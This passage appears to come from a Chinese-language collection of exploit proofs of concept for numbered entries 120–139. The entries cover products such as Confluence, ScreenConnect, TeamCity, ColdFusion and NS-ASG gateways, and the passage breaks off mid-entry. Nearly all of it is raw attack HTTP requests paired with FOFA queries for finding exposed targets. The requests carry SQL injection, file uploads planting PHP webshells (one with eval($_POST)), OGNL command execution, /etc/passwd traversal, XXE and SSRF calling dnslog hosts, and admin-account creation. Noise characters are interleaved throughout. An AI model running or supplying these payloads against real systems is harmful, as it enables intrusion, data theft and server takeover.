- i. U$ X; x$ J4 I3 \+ Z ?* [- D% h6 E1 d) \, r! `
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234567 e7 r+ ^- T ~, N' m7 E/ O; J# V
9 e, a- f- e. S g
3 x5 v) {: I( H120. 北京百绰智能S40管理平台导入web.php任意文件上传
# o9 W5 f, k( iCVE-2024-1253
0 o3 W& T/ W7 W4 sFOFA:title="Smart管理平台"
+ K& S. A. l$ NPOST /useratte/web.php? HTTP/1.15 `, B" G4 w9 L7 W; F$ ^
Host: ip:port
% i w7 {' s" ~6 o5 l' P! y1 NCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
8 N: A. D2 f( X- _0 Z8 |User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% a8 _% @0 \% w( b% ^0 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' t, j: P' |+ I LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
P' r$ G( I' j4 {Accept-Encoding: gzip, deflate( }; h5 F k4 n, M! \
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793284 }+ F" g& N4 u9 N5 H9 ]
Content-Length: 597
4 R8 N" |- b! M# V# T: KOrigin: https://ip:port
X h+ [$ X2 N, DReferer: https://ip:port/sysmanage/licence.php* o7 T2 B4 R( i3 I5 P5 `
Upgrade-Insecure-Requests: 19 a/ e; D& p' v' O: @3 ^! P& Y
Sec-Fetch-Dest: document
" H, L, H5 L4 _% g! w; T' QSec-Fetch-Mode: navigate
+ Q4 i; D4 _ }4 h0 SSec-Fetch-Site: same-origin' J& b- z7 j* k: Y/ o) m# ]" H
Sec-Fetch-User: ?1
& H- n1 j2 M9 H5 u. LTe: trailers
9 e* _0 L6 q, y1 PConnection: close# m2 e3 H6 \* T j+ |
6 ^+ g7 q6 s$ s; t6 \) V% ?' N-----------------------------42328904123665875270630079328
3 m# Q5 K; P1 B) v( KContent-Disposition: form-data; name="file_upload"; filename="2.php"# c' S. a* {0 N( @
Content-Type: application/octet-stream. r9 G9 @* l; [) s( m6 D- V
, q( O( k1 S6 Q. t4 X6 N5 E
<?php phpinfo()?>0 c* @6 P, x# K6 j6 e
-----------------------------42328904123665875270630079328
6 _; i* x7 H, Q4 GContent-Disposition: form-data; name="id_type"
M# F0 z5 O$ c+ C8 t( T4 @
3 F. H- u5 F7 ]5 q2 E4 K' R$ v1
3 S# c( e7 g/ `* W4 [-----------------------------42328904123665875270630079328
0 n+ }4 y% u3 s+ D3 {' MContent-Disposition: form-data; name="1_ck"- e1 ~9 V0 ?5 F
6 a2 O% O1 F2 ?' r1_radhttp5 _9 j" u( [. |9 X; W p
-----------------------------42328904123665875270630079328" |1 I. b4 Y' e; w- m! }8 O% J
Content-Disposition: form-data; name="mode"' o+ t1 Y! [3 ?# ]/ Y. b' y( z
3 [$ Y! c8 A3 [6 h2 d' H
import }1 Q+ G: c! o6 L
-----------------------------42328904123665875270630079328
4 l9 C% \ D& f, r/ j' D' }4 G6 }+ K9 f: q
9 T+ U! u4 e2 Z" F* W
文件路径/upload/2.php- L3 M( c9 b5 M" t) G0 b# b
4 o* K3 L6 m# P' @" [3 [2 x' s121. 北京百绰智能S42管理平台userattestation.php任意文件上传
* S7 F3 W O5 Y* S& Z6 H2 GCVE-2024-1918" C- H9 b+ r s+ K/ r2 O: }- W5 Z5 J
FOFA:title="Smart管理平台"
$ ~, K# P3 t# J( h6 nPOST /useratte/userattestation.php HTTP/1.1
6 o N: `% p$ Q: N7 h, pHost: 192.168.40.130:84435 d8 }2 \$ v: g6 j/ _" i
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
/ C& x' |- c9 ~! I0 v6 LUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
1 O3 D1 o3 s& [3 N% I1 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 Y& e5 c% e }2 r4 Q% ]. H+ V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ G" W1 _9 B1 q4 V U: tAccept-Encoding: gzip, deflate. n( q. W, B, @
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328 P- m5 I% Q* R+ R* [
Content-Length: 592! V: o. ~" a4 H5 W
Origin: https://192.168.40.130:8443/ j I _0 D( e+ O9 R6 I
Upgrade-Insecure-Requests: 1
; N) d# i, s# FSec-Fetch-Dest: document8 @" I7 Q' y' t4 |9 X6 X; c
Sec-Fetch-Mode: navigate
" j* N2 s2 u& p1 ESec-Fetch-Site: same-origin
) v5 K7 I: Z" Y e' nSec-Fetch-User: ?1
% K; \8 O; e" G; F" L1 c' d2 ATe: trailers' M! \' e5 o* w; n- p8 W# z
Connection: close0 {9 }1 k8 V |
: z; R: b% x4 x+ ^5 c-----------------------------42328904123665875270630079328
, z1 y4 K& C* i8 `7 ` OContent-Disposition: form-data; name="web_img"; filename="1.php"
7 u1 m7 }% c7 A5 C8 y5 oContent-Type: application/octet-stream0 Z$ Z2 b! e% p3 `+ w
- I) y0 E$ {6 p" j( n- n
<?php phpinfo();?>
" m! ]5 z" t0 b: Q! y2 E; W-----------------------------42328904123665875270630079328: o# m: t9 c6 L( N1 x$ d+ v
Content-Disposition: form-data; name="id_type"
+ N: w7 Y* ~/ ?; P9 D3 P& y+ @# D0 W F/ T* _- n- v n
1- V5 u* k% _2 V/ B
-----------------------------42328904123665875270630079328& ^" U! ]7 ~# s4 J+ w; b
Content-Disposition: form-data; name="1_ck"! U7 ~" b v U2 }8 V6 w- T# R$ ?
6 D% Z N5 Q: K6 y. L( ^1_radhttp( g* P' @' Y0 Y% ?- C
-----------------------------42328904123665875270630079328
( P1 N# H( M0 t" P MContent-Disposition: form-data; name="hidwel"
; V. w: S* E" J/ G7 J
, R0 Z+ l* E8 c1 f \3 F" nset5 ^' d# {$ }: Y( N
-----------------------------42328904123665875270630079328% j+ f" c1 s3 R+ ?! x2 U: y
+ R+ x3 M# {1 g% Q4 P8 |* T$ S( X
boot/web/upload/weblogo/1.php
5 L7 J. j' h2 L" j0 |+ c. P' n- M. n. l3 P
122. 北京百绰智能s200管理平台/importexport.php sql注入
3 r+ C, X" Z7 X4 q4 \+ {% Z5 E' sCVE-2024-27718FOFA:title="Smart管理平台"/ _3 {' V! X' w B$ z- H8 p
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()0 I* i' w/ D9 U# l" @: L# g
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
2 k" J9 }( P6 c4 F2 X/ pHost: x.x.x.x3 K; B5 `/ |& G
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
# K1 ?0 G9 H/ H! T, eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; H) r$ t( O9 Z% z8 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& s j& ?) z0 O( Y! r& IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. }& X) E$ y0 l) |+ |. A2 ]' nAccept-Encoding: gzip, deflate, br
. C6 H( K' s- ?! e y" Z) WUpgrade-Insecure-Requests: 1
2 a, G/ u4 ]( m: I3 y/ I1 zSec-Fetch-Dest: document
& s: t: G% @- ^4 S+ fSec-Fetch-Mode: navigate
& `& q! R3 k( ^. K! S1 eSec-Fetch-Site: none9 r9 q( C. ]1 y; _$ C
Sec-Fetch-User: ?17 L7 c, _7 p9 z( m5 J- H `5 W( v3 `
Te: trailers
2 {' Y) U7 }+ M# V4 ?" SConnection: close% R0 u. _& E d/ [& G" f% T! v1 c4 p
5 P" y# W5 K4 z) D
/ w' {6 \) ]+ n1 w* s
123. Atlassian Confluence 模板注入代码执行( f: |4 H2 ?1 o. Z
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3", r7 J1 I3 h8 A3 _
POST /template/aui/text-inline.vm HTTP/1.10 k$ q7 B, q7 |1 ]; ?+ J) @7 {
Host: localhost:80901 e; F& k) `# s9 B. X5 E; @: ~
Accept-Encoding: gzip, deflate, br
2 R# ^ b! a9 F, t: j0 wAccept: */*
0 M1 C- Z; J; F: K8 I! fAccept-Language: en-US;q=0.9,en;q=0.8
7 s' _) ?* L; p* Y+ U HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.361 c2 L* B' j5 k: k$ V
Connection: close% q; D6 @! m( x& B
Content-Type: application/x-www-form-urlencoded. q. w" z. o4 @+ H6 \& V
1 }! ~2 w4 d8 ?6 o- N0 \
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))/ Z, D5 J4 R' h
8 A$ z- F" U- R- E. C4 _( ^/ }: V4 K. r/ p2 M
124. 湖南建研工程质量检测系统任意文件上传# r& b' G7 Y. W
FOFA:body="/Content/Theme/Standard/webSite/login.css"4 F( A1 b, }/ ~% x/ f; }, L
POST /Scripts/admintool?type=updatefile HTTP/1.1
& v$ E5 j, ~. \/ R4 p* SHost: 192.168.40.130:8282; c) K' `2 f7 g t0 Q* l7 H! V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 M: d' x# n7 g9 q! F1 Q& p5 b
Content-Length: 728 I. y% D1 ^2 x" F3 z. H6 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.82 S B+ G. Y. O
Accept-Encoding: gzip, deflate, br
4 L. [( L1 o/ d0 O0 W! mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: F% [* c+ K' GConnection: close
+ i1 K2 m* l) r; ]; g& ~ J- m' D& RContent-Type: application/x-www-form-urlencoded1 @2 a7 X- \. n' F; q
: a% a6 S C* g4 w. T
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
0 g/ M7 z3 G4 |; l# Q* C Y0 [. H1 V9 T! v+ U0 U' g4 f' ^( e
2 [3 s' t' u% z% M# chttp://192.168.40.130:8282/Scripts/abcgcg.aspx! U, a: g: d: X# |
# ^) a- d3 I& ^5 X) @ i: s125. ConnectWise ScreenConnect身份验证绕过
/ N' d" K+ F8 I2 _9 KCVE-2024-1709# j/ b1 R6 n: x" j
FOFA:icon_hash="-82958153"! R7 I0 P0 z+ L! Z0 t
https://github.com/watchtowrlabs ... bypass-add-user-poc1 y0 y' \: F$ [, X% [8 J8 b
9 R% K/ j% u& i# T" }7 ?- s/ V& R6 {
6 j( g0 J- ^% {9 L* d使用方法$ N* Q R {) |! h
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!8 x8 w/ r& c) l! {
% A1 t3 B. j' z7 i% O! Q
. X. I5 f2 c* G0 m" N创建好用户后直接登录后台,可以执行系统命令。, L9 B8 a2 i$ h) M/ s
! O- X8 ^; A# Z5 T0 v# s4 t
126. Aiohttp 路径遍历$ K) f$ b# i/ P+ I
FOFA:title=="ComfyUI"$ ^. a3 g% {( c8 W. V9 M* A
GET /static/../../../../../etc/passwd HTTP/1.1
/ b, M4 h/ ^- G% F5 q+ o1 ZHost: x.x.x.x
3 x% U' t( y* W0 K) ]# S& C, fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 X) Q! `9 l! k% o9 g$ D" @Connection: close/ H, _: R( p- s, R( h1 G! g) P
Accept: */*4 B5 C& a0 @+ A- S- g
Accept-Language: en
' V, h0 r3 L# x1 c9 E: C" PAccept-Encoding: gzip
, R/ Q P6 A! {" T8 @9 G8 O; f# i4 t' C+ ^" V3 |
; d& ~9 K" C/ R1 P$ n; F
127. 广联达Linkworks DataExchange.ashx XXE7 E+ L5 C" U# G6 W
FOFA:body="Services/Identification/login.ashx" ' q3 u- T0 ?6 P: g$ b$ R7 i( \ c! f
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1, E3 _/ t# l9 h8 d0 w. X
Host: 192.168.40.130:8888
- ?' B$ e- Q1 ] q; _0 k6 ?2 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36- a1 P$ d/ T6 e7 e7 C
Content-Length: 415 z$ u5 `2 v8 E* k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 y/ h" T# c! `* d% W( s/ pAccept-Encoding: gzip, deflate
* |1 K1 Z ~" I% j! cAccept-Language: zh-CN,zh;q=0.9
1 I/ E: n! X# f+ RConnection: close
' |/ r8 f! `: y0 c' @Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
8 F4 V a. I0 p+ o% bPurpose: prefetch2 D2 k9 e/ l" v! L. z, [
Sec-Purpose: prefetch;prerender
4 H, C4 m% r+ M+ E# l8 @# E+ }' J0 H2 u4 A
------WebKitFormBoundaryJGgV5l5ta05yAIe0& n5 o. B* {3 ]
Content-Disposition: form-data;name="SystemName"
' J. @. e0 d) o, @/ `; P1 e3 p# m* n7 e# w! `" X! N% m" ^ V4 Z
BIM
( q% K G5 \- V% u------WebKitFormBoundaryJGgV5l5ta05yAIe0" ^- w: k6 Q; H
Content-Disposition: form-data;name="Params"
& e l' ^1 M+ R8 \: v; cContent-Type: text/plain% c7 ]# \ d7 t. l
; }6 v8 S/ m$ C6 s% n! X5 z<?xml version="1.0" encoding="UTF-8"?>5 h- \$ d; O; @/ ~- k* W. r2 O7 S0 n; G
<!DOCTYPE test [4 ~- j. e, _/ v9 V; |
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">% u3 N6 [, K @( I1 f7 [. h/ J3 M
]
! N; [ c( e7 u7 \>
9 h5 k1 q0 x) j4 o/ X<test>&t;</test>
7 d2 [8 U& A" r/ ]! M3 x4 N' H------WebKitFormBoundaryJGgV5l5ta05yAIe0--
6 J. E, l* f+ V- U) t; ?$ D% R
1 Q9 M' L& q" x m; C% K, @, D4 Y3 p+ C. v( @8 n1 F1 T+ }
o% g% c9 o ?0 e! O
128. Adobe ColdFusion 反序列化2 R& }& Q: R' s
CVE-2023-38203: Q, S- ^0 j0 `0 _
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)' V" F# n3 x1 U0 e' a
FOFA:app="Adobe-ColdFusion"
! y0 S# H; Q) ePAYLOAD
. N" @7 w1 \+ Z/ D
" K5 X( a: b0 j4 F5 R3 K& ~1 g129. Adobe ColdFusion 任意文件读取
0 ? i' a9 C2 M% s1 G8 YCVE-2024-20767
& t( X: Y2 K1 U+ QFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
- h* @- Q; m8 N2 m6 h1 c2 A7 Q8 f% m; v第一步,获取uuid
# }- G: D3 n/ I8 C& q2 x1 ]GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
/ j, _& H5 o7 u4 Y' aHost: x.x.x.x
7 ^! b- ?6 [( J. D' AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% i' H; A% d+ g6 x0 n9 p* n1 H2 D/ EAccept: */*
2 U( D9 Y4 y* k5 aAccept-Encoding: gzip, deflate+ y( w9 S' {3 Z' k
Connection: close
3 F0 v# A! t# j7 B; ]! r" A: `" G( m: P
0 K0 L9 D- s/ X* b: f0 ]. R
9 u" A9 l+ B, Y/ Y( ~" X第二步,读取/etc/passwd文件& c I7 L5 i: V8 b1 {& _
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
" N. r& b3 `2 d' m" h6 F4 O0 QHost: x.x.x.x
* U! g+ G x# l( F. |6 |: wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: O. | s( E0 g; s- c
Accept: */** z0 \. v# @! p. {, ~
Accept-Encoding: gzip, deflate
; D8 |& y s% i5 w; F' mConnection: close
8 T) z4 q6 I0 {! ]9 O6 [- ouuid: 85f60018-a654-4410-a783-f81cbd5000b9/ N1 L& x1 u% D0 A
A7 |3 |, t: b }! d
" h1 G# Z K0 T4 n1 A g; B130. Laykefu客服系统任意文件上传# Z# V [. T" H2 A# t
FOFA:icon_hash="-334624619"
: z" B9 [# u5 l0 V- J8 l! xPOST /admin/users/upavatar.html HTTP/1.1
! [& i& P# [3 D! yHost: 127.0.0.1% y$ Z( C; X2 s' y! L" N$ u3 t% G9 Y
Accept: application/json, text/javascript, */*; q=0.01
3 A- d6 S4 @/ G: WX-Requested-With: XMLHttpRequest
' E4 Y5 \" C1 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26* k- n% k7 l" P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR$ A6 u' ]. `* ^
Accept-Encoding: gzip, deflate
1 Q0 B. o& Q1 `Accept-Language: zh-CN,zh;q=0.9
* S, g3 |+ S$ n0 kCookie: user_name=1; user_id=3
, l: Y* m% d0 r( T$ N: iConnection: close' H8 h1 ^8 v5 j, S4 c, u1 x
6 ?6 k' x& e: q) I------WebKitFormBoundary3OCVBiwBVsNuB2kR0 L. m) t1 T. {: }% R
Content-Disposition: form-data; name="file"; filename="1.php"
, I. d3 _/ @- k- Q1 d0 p s4 S4 \Content-Type: image/png
4 t+ v1 ?& D( A. B+ E' ?) |! }
/ F% R. ^5 e! e, n" `3 t<?php phpinfo();@eval($_POST['sec']);?>
$ A N' [. T2 [2 S( T" f1 u Y------WebKitFormBoundary3OCVBiwBVsNuB2kR--
0 @0 |" P4 b4 c' W
% w+ Z/ X8 O0 N% p1 b; M
# D. M( Q* _1 t( n) w* k* |* b- \131. Mini-Tmall <=20231017 SQL注入
- p0 A, M1 s( i) p; jFOFA:icon_hash="-2087517259"
5 l* m/ o0 ] F" I3 H& \3 y4 V V/ P后台地址:http://localhost:8080/tmall/admin
- I5 }# n: _' c1 x2 g0 j* v% vhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
/ w+ o- |7 A# M! l# u( W; d2 a. k; D5 u/ X
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
& D" m- V( T+ T8 i! PCVE-2024-27198
* U- W$ @3 A1 K( {9 L5 TFOFA:body="Log in to TeamCity") n4 v' [# [( k+ }
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
0 }0 a- f: Q b A4 sHost: 192.168.40.130:81114 E6 v0 z5 F# |& V W" \& |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. a$ Y* h8 ~: TAccept: */*7 C: j, c" Q2 N$ Q) b: K( {. t
Content-Type: application/json- y( j' N- b) Y0 a
Accept-Encoding: gzip, deflate/ F) _+ o" E9 A. Y: u/ n
; n% o% y2 l% k. y) A! {/ R6 l: p{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
4 s& G# C* {. b9 {4 k2 S
2 x- V" Y' d5 \! m9 }' s8 V0 ?# U* C3 [5 o* J) @( K; ]
CVE-2024-27199
4 E, o: e* b( a+ ]- _! w/res/../admin/diagnostic.jsp' X: o$ H0 B: S4 D8 z7 R& m
/.well-known/acme-challenge/../../admin/diagnostic.jsp
v8 k( N% f$ c0 I1 `' u4 c1 p/update/../admin/diagnostic.jsp+ ~# @4 N1 z1 u& g8 v) l
/ K' |# \# ^% z E8 H1 A. r' ^& z M( U, @: b6 z5 G
CVE-2024-27198-RCE.py
" D3 v) z9 X. t% X
: i" O# y" T4 U133. H5 云商城 file.php 文件上传
& d0 w) f( d& d. v$ d+ UFOFA:body="/public/qbsp.php"
1 k+ _3 Q# \: c6 g' [' M# Q+ X8 ?POST /admin/commodtiy/file.php?upload=1 HTTP/1.16 A+ y% r2 ^8 ^' T, ^
Host: your-ip
4 g6 u* N' l, e. \ R3 D4 S$ {- lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% b4 R* K [( _; W5 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
{9 S6 C; p6 X2 I
* }+ ]3 m; C" u; F1 B------WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ F9 ]' _/ u8 ^7 P8 c8 ?+ @Content-Disposition: form-data; name="file"; filename="rce.php": a; |! o( o- r- [/ V4 i7 T! {
Content-Type: application/octet-stream
9 j$ X5 U, t: A; T $ C4 K( \+ @' k& @) r
<?php system("cat /etc/passwd");unlink(__FILE__);?>
3 U3 H% [% F6 j0 v T------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
! ~. Z, x. ~4 c% {. [9 ~
2 t4 ~# Y* B3 C, I8 f
2 O' n% Y2 Q) u
9 T" ~8 l4 l4 P: w: e134. 网康NS-ASG应用安全网关index.php sql注入4 G+ {! W3 c- Z# o
CVE-2024-2330
0 u j6 C$ \0 ]$ Z! ]* j/ k0 CNetentsec NS-ASG Application Security Gateway 6.3版本
! ?" Y" J2 k3 i( g4 X3 _/ UFOFA:app="网康科技-NS-ASG安全网关"
9 a0 p. F, S- M2 j) O3 {4 APOST /protocol/index.php HTTP/1.11 h; `( }+ m# z/ r3 a3 Y p& r; Y
Host: x.x.x.x+ v6 L& ]" z- [
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
! V6 p/ m) c3 B& L( |+ QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
* g9 x$ z/ Y$ \$ ]* B) V( q: gAccept: */*4 n8 V( _# J4 n8 Z5 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# _0 P, }/ q/ }' {5 fAccept-Encoding: gzip, deflate7 ^% O7 p6 F, h
Sec-Fetch-Dest: empty
8 Z" P1 g+ l- {Sec-Fetch-Mode: cors
! R' G6 |' K1 B: ^Sec-Fetch-Site: same-origin
/ h# h6 _8 V; f7 [- o9 eTe: trailers1 ^9 \4 G6 [. s) ~' s
Connection: close5 S& O1 o( g3 i {1 _' \
Content-Type: application/x-www-form-urlencoded }! v% c5 x r5 w+ f! h
Content-Length: 263 y" B- E4 h/ b1 j4 ?) H9 w
2 O/ b2 A+ w; R" H3 O' b. Zjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}5 I& A. E* ~9 r2 x
. r1 Y4 w! F" W
4 h8 F* z0 l) @+ y% g4 c135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
+ N1 N {: L+ h/ gCVE-2024-2022
, A& L, k+ n4 s, G* [1 vNetentsec NS-ASG Application Security Gateway 6.3版本0 I4 X1 Z8 G/ h/ Y
FOFA:app="网康科技-NS-ASG安全网关"
9 V4 e/ B7 c& G5 z% N, B# uGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
0 ]1 m/ J9 a, N' B' k/ c UHost: x.x.x.x: A/ l6 `3 p; H- `, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) X: ~* S) n ^8 i2 D# aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) h# o$ J6 P1 _7 K$ m7 y8 e
Accept-Encoding: gzip, deflate
! H! h) a& j% E3 K6 jAccept-Language: zh-CN,zh;q=0.9
& m- I/ x- K/ \9 M$ [/ Q2 XConnection: close
6 B8 j. s$ x& T/ V- {6 k' e
# n' Z6 g& u, Y
3 B8 j" Q0 E; m" Z N) V136. NextChat cors SSRF4 h9 a7 c: {$ y* y2 W# ?5 N8 n
CVE-2023-49785- ^ F# m. v$ a: o
FOFA:title="NextChat"; Q4 u+ M7 A+ v! j. ^8 z
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1# J. ~+ C5 x I( u2 K$ m% y+ P: c
Host: x.x.x.x:10000# M# U; l7 L9 }6 k4 p2 ~1 o" ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 ~$ \: O" {5 z5 O- f& w8 ^5 pConnection: close
x( P- P7 e5 y/ GAccept: */*% w. H9 O6 W6 {9 Q% F9 {
Accept-Language: en( E9 U; q' X' e3 R; h
Accept-Encoding: gzip
- z7 A+ E3 A/ @' p" k
& H' U; L: ~, K: b3 K( t- I' |. E* k( v
137. 福建科立迅通信指挥调度平台down_file.php sql注入( g0 Q/ u9 @# s5 D2 n+ U2 K
CVE-2024-2620
4 X& W2 }; T% `" d+ ?$ ~8 B3 fFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"$ g8 F& |" c" [1 }" V" |
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1* D# A* ~% F) h+ }$ Y/ W1 p' b7 @
Host: x.x.x.x0 J0 t% s5 E& T5 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 E. f$ {4 y- u! r9 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ O% h$ k7 l9 K) F2 t3 p" @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; Z- K8 B* J' q3 RAccept-Encoding: gzip, deflate, br5 r8 [5 [, i, q/ Y3 U/ Y! b
Connection: close. e, ~) |1 X3 n0 w* U
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj$ t6 W& M# s; F
Upgrade-Insecure-Requests: 19 P9 A4 X. W, y; a+ ]; |% c
# m" Q5 W: u% c1 j, m6 t3 X
* R( Q# {3 l, j5 M# Y" }
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( h& `: R h7 |& _' l
CVE-2024-2621
! p8 f3 z6 d5 i% l: Z5 SFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! A6 m6 f% L) i l( W. r& N8 BGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
9 [5 o% d# O4 K5 \5 _9 LHost: x.x.x.x
) U, A a$ p4 v! l, HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' t+ a8 [1 f9 O1 E9 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" ?2 P/ |6 n8 I$ R0 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; V: J9 P( s# r0 S$ C: Z
Accept-Encoding: gzip, deflate, br6 r, }0 t x+ S% Z s5 ^
Connection: close
/ X: \) Z5 i) ?- o% [Upgrade-Insecure-Requests: 1 D2 N3 @8 l- i! w' o- ~
. p! G7 K& V8 r* g# K
# ^+ y' }+ u2 E, r3 R& B139. 福建科立讯通信指挥调度平台editemedia.php sql注入
) g: L' E7 y& O" d0 NCVE-2024-2622: D" ]( E6 L- x1 \% W. \5 e
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"# Z' u5 y# j: x8 B" K% ]% n
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
